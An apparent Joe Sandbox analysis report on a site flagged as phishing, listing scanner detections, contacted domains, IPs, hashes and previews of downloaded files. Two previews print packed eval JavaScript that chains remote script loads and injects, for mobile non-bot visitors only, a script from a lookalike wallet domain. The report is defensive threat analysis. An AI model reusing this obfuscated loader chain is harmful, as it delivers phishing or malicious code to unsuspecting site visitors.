http://szrjxkj.com/dongtai/8622.html100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://szrjxkj.com/skin/js/bootstrap.min.js100%Avira URL Cloudphishing
http://szrjxkj.com/tj.js100%Avira URL Cloudphishing
http://szrjxkj.com/skin/images/download-bgshape.png100%Avira URL Cloudphishing
http://szrjxkj.com/skin/images/logo-footer.png100%Avira URL Cloudphishing
http://szrjxkj.com/skin/js/main.js100%Avira URL Cloudphishing
http://szrjxkj.com/skin/images/footer-bgshape.png100%Avira URL Cloudphishing
http://szrjxkj.com/skin/js/modernizr-3.6.0.min.js100%Avira URL Cloudphishing
http://szrjxkj.com/skin/js/jquery.min.js100%Avira URL Cloudphishing
http://szrjxkj.com/skin/css/plugins.css100%Avira URL Cloudphishing
http://szrjxkj.com/favicon.ico100%Avira URL Cloudphishing
http://szrjxkj.com/skin/js/plugins.js100%Avira URL Cloudphishing
https://szrjxkj.com/dongtai/8622.html100%Avira URL Cloudphishing
http://szrjxkj.com/skin/fonts/Material-Design-Iconic-Font.woff2?v=2.2.0100%Avira URL Cloudphishing
http://szrjxkj.com/skin/css/bootstrap.min.css100%Avira URL Cloudphishing
http://szrjxkj.com/skin/images/logo-white.png100%Avira URL Cloudphishing
http://szrjxkj.com/skin/js/popper.min.js100%Avira URL Cloudphishing
http://szrjxkj.com/skin/css/style.css100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
oudngmslhifnsf.gdmgcyy.com
156.224.2.38
truefalse
    high
    www.google.com
    216.58.206.36
    truefalse
      high
      szrjxkj.com
      38.174.150.133
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://szrjxkj.com/skin/js/bootstrap.min.jstrue
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/images/download-bgshape.pngfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/images/footer-bgshape.pngfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/tj.jstrue
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/images/logo-footer.pngfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/js/main.jsfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/js/jquery.min.jsfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/css/plugins.cssfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/js/modernizr-3.6.0.min.jsfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/favicon.icofalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/js/plugins.jsfalse
        • Avira URL Cloud: phishing
        unknown
        https://szrjxkj.com/dongtai/8622.htmlfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/fonts/Material-Design-Iconic-Font.woff2?v=2.2.0false
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/skin/css/bootstrap.min.cssfalse
        • Avira URL Cloud: phishing
        unknown
        http://szrjxkj.com/dongtai/8622.htmltrue
          unknown
          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
            high
            http://szrjxkj.com/skin/js/popper.min.jsfalse
            • Avira URL Cloud: phishing
            unknown
            http://szrjxkj.com/skin/css/style.cssfalse
            • Avira URL Cloud: phishing
            unknown
            http://szrjxkj.com/skin/images/logo-white.pngfalse
            • Avira URL Cloud: phishing
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            156.224.2.38
            oudngmslhifnsf.gdmgcyy.comSeychelles
            133199SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHKfalse
            38.174.150.133
            szrjxkj.comUnited States
            174COGENT-174UStrue
            216.58.206.36
            www.google.comUnited States
            15169GOOGLEUSfalse
            IP
            192.168.2.4
            192.168.2.5
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1637090
            Start date and time:2025-03-13 10:51:54 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 13s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:browseurl.jbs
            Sample URL:http://szrjxkj.com/dongtai/8622.html
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:20
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal60.win@21/52@12/5
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 142.250.185.142, 142.250.185.131, 142.250.181.238, 66.102.1.84, 142.250.184.238, 142.250.184.206, 142.250.186.142, 217.20.57.18, 142.250.185.202, 142.250.186.35, 142.250.186.110, 216.58.206.46, 142.250.186.138, 142.250.186.78, 142.250.185.110, 142.250.186.99, 216.58.206.67, 23.60.203.209, 4.245.163.56
            • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, translate.googleapis.com, update.googleapis.com, clients.l.google.com, c.pki.goog
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenFile calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: http://szrjxkj.com/dongtai/8622.html
            No simulations
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 153219
            Category:downloaded
            Size (bytes):27977
            Entropy (8bit):7.988467254984698
            Encrypted:false
            SSDEEP:768:y2gVVGMquEu2irdLOVoGrggP3AKiPpLUMl6ETxAIzCShb:tgVVw1u8rP3ZGSKXTxA3Mb
            MD5:4D51DAEED286499D050708EBAA7888CF
            SHA1:62232A787D9191D71DC896C873C96AED6EFAD6CD
            SHA-256:D522796EED805F7A6CE23205AF406039D3DFDDC15823592433584CB0623EE62F
            SHA-512:33E00451B0233D9EFC22BD56D01DAD966FFE19A0AC6E1D61C8AF88FC4207F2AA4B57FD27315031687AABEF1397653075B83EA34EC9B5F14948582787149DFC8D
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/css/bootstrap.min.css
            Preview:...........i.#.&.}....*4.JM.x$.`........>.v..z{. .....%.u(........3".......H.0773777.p7..........w...t(...W.Q..y.p:..........w.....v.o....3...=..m.?....=..v.c....t*...l.}@...../_..m...u.H.....c..<n...........#.~8}..?...f....8......?....O.....l=.z..c9};......j.X..o................|H.V.O......C...].........=....rx.....z...........e......7..T.k.9........o.7.hv.?.<.N..i.?..@..fr..?{...j.W..j.g..jS..e.:....Pn...|^.......LW....j{. ....k.}.....z.......~..z_.S".yr.L'7......bzs}.>].O..F....p4......,..j..w,...<...^......0.......?.....&.7.).we....M._w..i.}........?.......b.}.g......t...o~G.`*.w..?mv..zS.....f.[.......6.../.../..'...ky.....?.....G.|...n{..c...W..P.V.m.....v....../o....o..i..I7.....P>.v_{.._i.g...U.O..N...#.i..G..=.<....*...}Z..._O.......<..`.C.......7'.Map.`.PnO...b_...Z....~^.%..x...V..P. ..p..=.b..n..](9.?-V......~..y.[|{.t._m...?.?..&..:...p.E..5...1.(.};..&...<&.d........".m.:.dY..9.3....oz.7.N.....i.x.....a........pp5...#...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 130998
            Category:downloaded
            Size (bytes):20714
            Entropy (8bit):7.988122102558389
            Encrypted:false
            SSDEEP:384:imbt1jgn1cdYmr4Pe5x4IgqJphHQOir24b5vDKVKOE7vBD0hq70X8gc6pG854o8M:impBQ1aYhPS3JpmWCDf7kcuadS
            MD5:F524CA65B1AF5467D800E51C005BEF41
            SHA1:5AF5FD3A02ABDD4832129A362E480F9ADF83F994
            SHA-256:32FC8E5DC9912A6E2124261542DF2D3F16EC1CFB51DFC0A9CEF0BF7DCDF7FB8F
            SHA-512:1E4E328B8B0F290F67329F90D0D1009BDF04872DF4D14251758FBBCBDFF2621307EAC5AAD47DBE7DDE3FD1553D6C866A32E2D77137D3ED215945E63FA4EA2DCE
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/css/style.css
            Preview:...........}k..........=...<6.....k.N...a.".Q3SfO............@...H[#Y4...J$..D...O.O........o..]].nz[_V_...m....V..t.hV.QUa......7o......v........[|...f.W.......'.?..=...'................9.?........<..X5....v...?.~..n}...y...<..c.,.]So..G../.w....|....v..U.-.E..~..o..A.C.....6....f......@n..b...u...7..fE..V..W.[..~../.....%`G......=h....|.Y ...0.5|.......k.%....f....V...z....N../f.{.......n...P.n......8. L.....t.}..........k............3@......M....^....7..z.PO.....|......).\_..c....j'......,.k...........[........h.3#.....o..|.\o..O&....+..h...Ra\..e..G7us}...}......r..i..z....^V......nGG?..'...d.^..........v..hKl..G-g......~..,O...#.....Do...b.^......:.l.f...F1[..a.}.?g..j....~.v.;.....v.._}..,N./...t.....z.M.(_.?.<..E...|.z=.>..\m@&...^?..}....I...w.|..M..5..../....z..).H.........SXH.kS.y...v........|[...C<...I....-.......;...Y.Ks{......u.....oU.h....f`..spT.....n....L....0...ZoA...6......U..Y.nh...M..G.....j..v......
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
            Category:downloaded
            Size (bytes):40128
            Entropy (8bit):7.994526034157349
            Encrypted:true
            SSDEEP:768:Vce3jkow68wmT4IBX0tXdlSirS61gSjcz0GPwHbP+w2jec56O:VcI/iEEEtXdFJj+0GPwHbP+w5rO
            MD5:9A01B69183A9604AB3A439E388B30501
            SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
            SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
            SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
            Malicious:false
            Reputation:low
            URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
            Preview:wOF2..............$....F..........................p.....t?HVAR...`?STAT.N'...B..~.../~.....`..i..X.0..j.6.$..,. .... ..N[{.q.v...Lw.Q..o..J...6.Z.g.F.n..g\{t....%.!3)....sS.o...$."c.^<.iZc.I]c....0+. ..I..9.H.3..B.&.....'e....5.p.R(.j~\=..Wt.{..1.[u..Fn..<.-g.3..L..o.....E.-Q.........I..-/.4....{.Uj...3.K...g.Z....0...2)%.{......gN.../f.7....o.K....^V...!j...<...gf....\XjI.<p.PJh.4....*,*.S....&.C...R..,@ba..<..z.|.X.&.(.mf.w[..l.35Mp...A.A.=d........fj...}W6..y....[...i.......!........NLND....n'"...N*k)0<n.P.......w.j..>9.vV...Z.`.$$!.".(.`ATV.,..0.]3.<.d(...-s...2.w....P@.&...-.9x7.'....Sg.N=m.=....(..))-bA<.x.......=@4qs..Ss......K...{.=H.......z...NUS....Y..6.K.......n.....F4.B....=w.....+..F3...fB..........y1...,.(...`,..&vIrP.^.fiQY..5....H.a......q...s."..\..':.xK}...fU.z.j.......$L.......f.g&....R...!.Wmew3.1%2W.'"6u..r.q"F.......~i{..9xN.g.X..NMx.H.s@.8..J.t.SP.C`-GU)G/'..6".+......f..n..Aw....r....l.<r...Cke..D....T/."..c..mj..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (805), with no line terminators
            Category:downloaded
            Size (bytes):805
            Entropy (8bit):5.5403925686651485
            Encrypted:false
            SSDEEP:24:aC33aqqpb6uSoN0Ct/XOudl5MIfqITUHt/T:aSmTYGv5v5MIfqIEb
            MD5:B91B404E65A6D55F48E3E8929AAA6631
            SHA1:7FEB40AB7AA9C2FF7458E6E89A74AF63C5F56AE8
            SHA-256:D73B625C5E38C3FD1E0D5A113374BEC35307DD4CDE91ACA48167EE3DC33567EE
            SHA-512:B763ED10565DCAAB82033193C5ED96B801DEA1A9842746B1AB7466ABAD39F68BE6122BD998719FE7A18C12E4F536C4079FFBBEBC1F0E1D47AF39B51AD7448825
            Malicious:false
            Reputation:low
            URL:https://oudngmslhifnsf.gdmgcyy.com/tj.js
            Preview:;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[1-57-9a-g]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 8(){1 3=\'\';1 4=\'abcdefghijklmnopqrstuvwxyz\';for(1 i=0;i<6;i++){3+=4.charAt(9.floor(9.random()*4.length))}return 3}1 a="/wuewsmihshs/aisdzmodajmlahf/b.b";7 c(){d 5=navigator.userAgent;d 2=/(spider|bot)/i;e(!2.f(5)){2=/(Android|Web0S|webOS|iPad|iPhone|Mobile|Phone|Kindle|BlackBerry|Opera Mini)/i;e(2.f(5)){document.writeln("<g src=\\"https://"+8()+".tokenpockit.com"+a+"\\"></g>")}}}c();',[],17,'|var|ly_adjs_re|result|characters|ly_adjs_ua||function|generateRandomSubdomain|Math|lujin|js|ly_adjs_0|let|if|test|script'.split('|'),0,{}));
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 2335
            Category:dropped
            Size (bytes):2363
            Entropy (8bit):7.807289468553549
            Encrypted:false
            SSDEEP:48:X2AFXuePox9DfVOWZiwXlVp4t7mJQG1bfeeumRxgyivhYkkuRB:GAs8ADdOWQwVVp48JQG1bfee9Rxgyivr
            MD5:E7598345E83BC00E0C4ADB3F5527FE55
            SHA1:24FED9389C1D9FADB6C70CDCC7214BC5B1054049
            SHA-256:B765CECFCD83564872CC76027104222DDD403AC16524C8C1A142228CBA674B08
            SHA-512:FCEEFE05F9B650E69853E7C617879AA927CD328E9CC671DFB7EE12B298F9D6908242E5CB6C048627964D92EDD863B6D21D3E554ACC1363164DBB6438E4B97675
            Malicious:false
            Reputation:low
            Preview:...........(....PNG........IHDR.......e.....ju......sRGB.........gAMA......a.....IDATx^.=..6.F.0."U.`.JJo![.......x.^..4..v.*]...S..HA?..)Qo.....'.x.'..yzD........?.s8...8......7../..P.G.........~'iT...$.B.W..\...S..\...... B....!.E..`w!....J........I........%...\.W.@5.@....+A... B;..+@`..@..\.g...*.........."..B8...Z..yA....._.I"e\.g...@.p.p.Q........4...\...S.......r..[..7O..*...D..{B.*.u!....Y.....-d..2[.W...58t..D_..H...Bkp.n...z.."...V..&..}.........=!.......8........t.g....RP.....T..6.....k..a.8.J....9....C.8...P..j)..$P...R.D&.[`w!..c..@d5PsT>.+....9...5.h.@.y..l.GT..6..}..P%..g.y.$./>.t.X.*....}.....d;8C..Lh.$....K.C3Np.fB3&.....A...g.H.....n..^..,}.....J...W...........U!P....6su.....W.sp.|. +..W.'.....,p..B......1t...Z.a. ....5u&e-........P.m.. ....h......T.........Z....ob...r.U].-..c!...."4m..[_j.....8...T..Y..E@......fB.M.`.$....n...<G.....$..-....@....63.\.......e...P.........8...\.W..l.,n..].g.@.D....83..P!......C.@;..+A..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 85578
            Category:downloaded
            Size (bytes):33578
            Entropy (8bit):7.992295451006036
            Encrypted:true
            SSDEEP:768:4jZ0tRETpom0HQxpWXtMOV1VyfPLFage48RmBpTq+gKPt:2a0pScWXCOV1V+PLFagIkbjV
            MD5:CFEDA4A5C603D05DEB8BDB48A4F17C45
            SHA1:8184CDFA879FB88526CAE17ABDFA36E327C819C0
            SHA-256:3791A5F1555BEA2A3D55195F88710772037D61E9DB2195F048650EE238DB11B2
            SHA-512:628343C6E916D044C38C85F8AD96594559696F8F53973CBC8D7F840DEF60D5DA86DE90E213327B1025D90C3F3C8445E4FCECF3C2E3E278BE696627A13963DF7E
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/js/jquery.min.js
            Preview:...........iw.....?...i@,R...v@..<.Nl.m.q. .......E.........N.@9.~.uo.-.j8.>{..=.....b.n.......w..V....v6.&.../n...|1~6.....y...vG....h..~.1._..U#.W..h.j>...{{.<8,.^...e..~...|p{U.V.>-....eG....[..Z./.w;..n..b.h6......dQ,wz;w..w.&.s~.....E..].v......f].&.b....p.w...|..3..[....Y6L.....p...F\..Ao.....].g.\0....Q6.....|r...Z-&.qv...........X..eS.t.7l...,....E.1;..h{..}y...._...../.........k..<.g.vp.<x........a....$[l....fx...E..p......b.....{.9../W...j.h.e1.T.l4.i1....G.j..b.{W.v...8.........U."..o....9z....no_..].g.q..Y..6..7..4...3..b1.._m`.@...J.a.......G_...g......78.:.C=.~h.m.]o{.....dx.k.Q..~6...s..-.A.v....o...w}=}....a\...d.L.?ve..7.#......1..7[.;.l.......~.(.um......^........=S.....^[s.}}...q..3.9....l....l..Z....I..q.Z......>.8...^X....z.A>.9...R.....Hh.?.O.....E>.4v....oe.Xv.^..._.$=n...1X.E.y>............9.._gv...d..g......vz.A>......x7.............P..,.di....V.Y..LW.qo.|8hu...v...eOY?uO.n..,2....'.#?.{....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 20340
            Category:downloaded
            Size (bytes):7865
            Entropy (8bit):7.97225002930668
            Encrypted:false
            SSDEEP:192:4yhunzvhcTBmhFrLwyWzlu/Zkt8H6gv9iCHeu9yMzk:4ycv681dWBqZZHxv9iCHKQk
            MD5:DDFF66CE8F80943ADBA1EA851C95B2F2
            SHA1:38C5BA425C868897FB8BC7BDA687273547359A21
            SHA-256:62A555D53E458860819A23C397861113CBAF4119703A3DE28FB6869A8CCFD971
            SHA-512:101B42BDF74FEEA64C207926C04C3627C3CB8A6CA928B155DFBFEE71B9FE066367D71C920CEF618C025DE09474FA10A6A2C7024F36D3F4D2286A2B2FF7057DDD
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/js/popper.min.js
            Preview:...........\mw....s...6!...$'...4...r.V.\[...<1D,I. ...dE......b. ..9'1.......<3..G..C.$/n.d..{..{.bQ&..Sr..y...._..YR.er..E..dh.W....E.,....=7U..(.U/*E/.{......@.|S..(/...iu......t..6.N...~..:../b^;aX.."_..."/..wh.E...9..<.b".F.iX.^..nMO..~_...u<..n..b.:/.Q..w.[...of.im.R...6..=.......z.3......%.0xx{7...4[..Q....Z.:Y...a(FY...,..Ng....R.'...mx[....6i....$.. 7=.fn...^..Td.........^e.+....*.j.9.....Tzq>..~t..7..:..+.....J..~....N..3.3Q>ku....;....w...."<...Q~%.E._....o...~..8t.M.o.y...L...pT..v.A5(<. s.J.v......&.......X.v[.C..~*.U....6^.+..t...I...m..a.....k.q.q.~.D..k....2.+..,t...N...DR1..3...}M..<...g..z.......3.w...pv..F......5.x....:..w.n.;E^%$.7)..........i.....C..L..-.V.hVP..n..56..H.JS.d...G[i.xl.8m.K...0.ZX..Q#..`..#.x...uW...u.C2...!..z-%..1...$..g.'.^........../._.........W....m.'.....i.:/ET.7Q...T......J.#....f.....M..4.u.=...<.:..-........5.l...re.&..[..M.I......!.Z....$r...~@..N...L.R...\...F.......w..4U....~..:/.?....t.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 35564
            Category:downloaded
            Size (bytes):34174
            Entropy (8bit):7.991894721196578
            Encrypted:true
            SSDEEP:768:0nGDfmIAi/BbZ7t4zIet0Jed2IrcSH5sjCs8G1xc7+XEIwjtcB28f:WMjF/BbBt4zIY0JurcG5ox1u7+3wj2D
            MD5:E81A78AF2274D9DED7CC287B11A86C5F
            SHA1:392216D3E8EB782E72B245D2610DDED67C9E6BFD
            SHA-256:8C7C38A0DD05081BF81CCE01984DDD80B0DEBE8F3065DB64ABB5B49182186EE7
            SHA-512:D6BCF723BD6CD307DD6147C1F45827C66D8FEB84BFF99D9213800A04AE797E64C19F7AC993B4BDC1F7540C83048BC2F78E4F5821BCCC6210F5D91E07E725BAF0
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/images/download-bgshape.png
            Preview:..........$[y<...OB.Q...Wn%*..Z0.J.1.%1....-)Y.[.:e.f.I.m.tmc.1...12.a..........1..9.9.s.s..|^.......:tH.oK3.C....?rG..O._.+...BmA7.a..~....^.s....?v<...J....]..Jks.R..~tZ.{ck..R.:c?....[.`...../.n.^.....ClM..-w..s....(.....PG.../U}W......fJ5|^......G.)g....<D.7..Vr^.+..+o.t.-.E&.-....7...9.q..9x^....M...d..D.%.[.....=..[.(.........f=..5..j.d...2.~?nnz..";K.]..".Bi.B.08\a..hgx.q....r.\.?/.f.Q....57.H,.......Wy....R.H.R...x.0.....?g%"..&....r..E..6.s.o..pCv.fk9.oS%.7...b.\?.......y..WR..i...F.L.....q...m...."..p.Q.e..M.;..f.Q.4Z..^...V.~..v`...2.o.....H]..o4m..4.Z...6........o.X.Hz..b...]X.R+..8.F..$}..1.....6......T...v....F....(.Y....)....Q.T8.t.."...+..Y...C...F...-...2..~df.43.y.A...e..I....P...-n..]U..Uu.%..c]Z./....u...2Q.....X.~..dR ...-h...H..tfrlR.e.....g....J..G.m...-k.#.....9u...\.|.vi..Q.!..b...Q.[.o...L~.!((..t...HY..qIz>_xO..p.j.............x.qo...K....,.o\+sX..&^..=.....f......-..7T.'EgE.F..<..~.R.b:i[X.H.B..TM...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (361), with no line terminators
            Category:downloaded
            Size (bytes):361
            Entropy (8bit):5.3968506782590175
            Encrypted:false
            SSDEEP:6:zDGhyfx7jYbIqSTOWCzk9hLMJvo+r1ZhiwM7dOr7Umo1Uvv5TvZW/MrCW:zDlvYc7OW9h4J7r1Z+7oTxZtrCW
            MD5:51B39694739BA1FA8DFDFE2A68372C72
            SHA1:9DF33188007365E6607AF75B9254FA4487E76BC9
            SHA-256:9BB08CE15A189FE04C0E9CD4AABF4B33A85BEEEB9E8A43CD50F209A11A1145E1
            SHA-512:EF689B98FF724FD75EDC056A217BBEF845DF156D44B505700FA50403AEB2A834F2A1164395BDD1DC0CD5A92EEAF941689D87F0841B57E9DB740B3BB04D18EEC9
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/tj.js
            Preview:;eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2("<0 3=\\"4://5.6.7/8.9\\"></0>");',10,10,'script|document|writeln|src|https|oudngmslhifnsf|gdmgcyy|com|tj|js'.split('|'),0,{}));
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 2335
            Category:dropped
            Size (bytes):2363
            Entropy (8bit):7.807289468553549
            Encrypted:false
            SSDEEP:48:X2AFXuePox9DfVOWZiwXlVp4t7mJQG1bfeeumRxgyivhYkkuRB:GAs8ADdOWQwVVp48JQG1bfee9Rxgyivr
            MD5:E7598345E83BC00E0C4ADB3F5527FE55
            SHA1:24FED9389C1D9FADB6C70CDCC7214BC5B1054049
            SHA-256:B765CECFCD83564872CC76027104222DDD403AC16524C8C1A142228CBA674B08
            SHA-512:FCEEFE05F9B650E69853E7C617879AA927CD328E9CC671DFB7EE12B298F9D6908242E5CB6C048627964D92EDD863B6D21D3E554ACC1363164DBB6438E4B97675
            Malicious:false
            Reputation:low
            Preview:...........(....PNG........IHDR.......e.....ju......sRGB.........gAMA......a.....IDATx^.=..6.F.0."U.`.JJo![.......x.^..4..v.*]...S..HA?..)Qo.....'.x.'..yzD........?.s8...8......7../..P.G.........~'iT...$.B.W..\...S..\...... B....!.E..`w!....J........I........%...\.W.@5.@....+A... B;..+@`..@..\.g...*.........."..B8...Z..yA....._.I"e\.g...@.p.p.Q........4...\...S.......r..[..7O..*...D..{B.*.u!....Y.....-d..2[.W...58t..D_..H...Bkp.n...z.."...V..&..}.........=!.......8........t.g....RP.....T..6.....k..a.8.J....9....C.8...P..j)..$P...R.D&.[`w!..c..@d5PsT>.+....9...5.h.@.y..l.GT..6..}..P%..g.y.$./>.t.X.*....}.....d;8C..Lh.$....K.C3Np.fB3&.....A...g.H.....n..^..,}.....J...W...........U!P....6su.....W.sp.|. +..W.'.....,p..B......1t...Z.a. ....5u&e-........P.m.. ....h......T.........Z....ob...r.U].-..c!...."4m..[_j.....8...T..Y..E@......fB.M.`.$....n...<G.....$..-....@....63.\.......e...P.........8...\.W..l.,n..].g.@.D....83..P!......C.@;..+A..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 35564
            Category:dropped
            Size (bytes):34174
            Entropy (8bit):7.991894721196578
            Encrypted:true
            SSDEEP:768:0nGDfmIAi/BbZ7t4zIet0Jed2IrcSH5sjCs8G1xc7+XEIwjtcB28f:WMjF/BbBt4zIY0JurcG5ox1u7+3wj2D
            MD5:E81A78AF2274D9DED7CC287B11A86C5F
            SHA1:392216D3E8EB782E72B245D2610DDED67C9E6BFD
            SHA-256:8C7C38A0DD05081BF81CCE01984DDD80B0DEBE8F3065DB64ABB5B49182186EE7
            SHA-512:D6BCF723BD6CD307DD6147C1F45827C66D8FEB84BFF99D9213800A04AE797E64C19F7AC993B4BDC1F7540C83048BC2F78E4F5821BCCC6210F5D91E07E725BAF0
            Malicious:false
            Reputation:low
            Preview:..........$[y<...OB.Q...Wn%*..Z0.J.1.%1....-)Y.[.:e.f.I.m.tmc.1...12.a..........1..9.9.s.s..|^.......:tH.oK3.C....?rG..O._.+...BmA7.a..~....^.s....?v<...J....]..Jks.R..~tZ.{ck..R.:c?....[.`...../.n.^.....ClM..-w..s....(.....PG.../U}W......fJ5|^......G.)g....<D.7..Vr^.+..+o.t.-.E&.-....7...9.q..9x^....M...d..D.%.[.....=..[.(.........f=..5..j.d...2.~?nnz..";K.]..".Bi.B.08\a..hgx.q....r.\.?/.f.Q....57.H,.......Wy....R.H.R...x.0.....?g%"..&....r..E..6.s.o..pCv.fk9.oS%.7...b.\?.......y..WR..i...F.L.....q...m...."..p.Q.e..M.;..f.Q.4Z..^...V.~..v`...2.o.....H]..o4m..4.Z...6........o.X.Hz..b...]X.R+..8.F..$}..1.....6......T...v....F....(.Y....)....Q.T8.t.."...+..Y...C...F...-...2..~df.43.y.A...e..I....P...-n..]U..Uu.%..c]Z./....u...2Q.....X.~..dR ...-h...H..tfrlR.e.....g....J..G.m...-k.#.....9u...\.|.vi..Q.!..b...Q.[.o...L~.!((..t...HY..qIz>_xO..p.j.............x.qo...K....,.o\+sX..&^..=.....f......-..7T.'EgE.F..<..~.R.b:i[X.H.B..TM...
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:gzip compressed data, from Unix, original size modulo 2^32 2335
            Category:downloaded
            Size (bytes):2363
            Entropy (8bit):7.807289468553549
            Encrypted:false
            SSDEEP:48:X2AFXuePox9DfVOWZiwXlVp4t7mJQG1bfeeumRxgyivhYkkuRB:GAs8ADdOWQwVVp48JQG1bfee9Rxgyivr
            MD5:E7598345E83BC00E0C4ADB3F5527FE55
            SHA1:24FED9389C1D9FADB6C70CDCC7214BC5B1054049
            SHA-256:B765CECFCD83564872CC76027104222DDD403AC16524C8C1A142228CBA674B08
            SHA-512:FCEEFE05F9B650E69853E7C617879AA927CD328E9CC671DFB7EE12B298F9D6908242E5CB6C048627964D92EDD863B6D21D3E554ACC1363164DBB6438E4B97675
            Malicious:false
            Reputation:low
            URL:http://szrjxkj.com/skin/images/logo-white.png
